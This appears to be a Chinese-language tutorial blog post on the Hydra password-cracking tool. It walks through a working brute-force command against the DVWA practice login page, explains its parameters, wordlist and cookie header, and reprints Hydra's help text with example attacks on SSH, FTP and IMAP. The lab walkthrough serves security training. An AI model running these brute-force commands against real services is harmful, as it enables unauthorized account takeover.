hydra 是一个网络帐号破解工具,支持多种协议。其作者是van Hauser,David Maciejak与其共同维护。hydra在所有支持GCC的平台能很好的编译,包括Linux,所有版本的BSD,Mac OS, Solaris等。


hydra 使用的具体参数文本如下:

hydra -V -l admin -o log -P darkweb2017-top10000.txt http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=llfvb69s8cv57g5c14sfrtr81c"


-V 详细模式,显示登录每次尝试的信息
-l 指定特定的用户名(即已经知道了用户名),这里已经知道用户名是 admin
-o 将信息输出到指定的文件,这里是log文件,(不指定也行)
-P 指定暴力破解的密码的文件来源,这里是从密码文件即字典 darkweb2017-top10000.txt 里面查找密码(所以好的字典很重要, 爆破字典 SecLists ) 当然是 IP 地址了,因为上面破解的是装在kali即本机里面的 DVWA 的登录
http-get-form 使用的是 http 的 GET 方式, 使用什么方式具体要看登录的程序使用的什么方式, 比如远程登录使用的是 ssh, 那么怎么指定 是 GET 方式还是 POST 方式呢?可以用 Burpsuite 截获一条登录信息来查看.

"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=llfvb69s8cv57g5c14sfrtr81c"


  • /DVWA/vulnerabilities/brute/ 这个是 IP 后面的地址扩展因为破解的页面的地址栏如下:

  • : 它们是用冒号 ":" 来分割信息的
  • username=^USER^&password=^PASS^&Login=Login 这个信息是用 burpsuite 截获的时候会看到,如下:

  • Username and/or password incorrect. 这个是登录失败的提示,如下

其实上面的登录失败提示可以写成 F=Username and/or password incorrect. 可以看一个 POST 方式例子,它就是写成这样

hydra -L names.txt -p a http-post-form "/4229312c64/login:username=^USER^&password=^PASS^:F=Invalid username:H=Cookie: session=eyJjYXJ0IjpbXX0.ELcBLw.ZnoGnldeUdY-gST8OKErk_lkbs8"
  • H=Cookie: security=low; PHPSESSID=llfvb69s8cv57g5c14sfrtr81c
    这里的 H 应该代表的是 Header 因为我看 hydra 手册的时候没看到,只是看到别人这么用,
    而且 它又是在头部,所以就猜测它是 Header 的意思代表 头部信息.
    那么这里为什么需要这个 H 呢? 因为如果没有 H, hydra 是看不到返回的错误信息的 Username and/or password incorrect.

详细的 hydra 使用手册可以用命令查看,命令如下:

# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@ (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

  hydra -l user -P passlist.txt
  hydra -L userlist.txt -p defaultpw imap://
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

还有 burpsuite 使用建议查看 << Burp Suite 实战指南 >> 这本书


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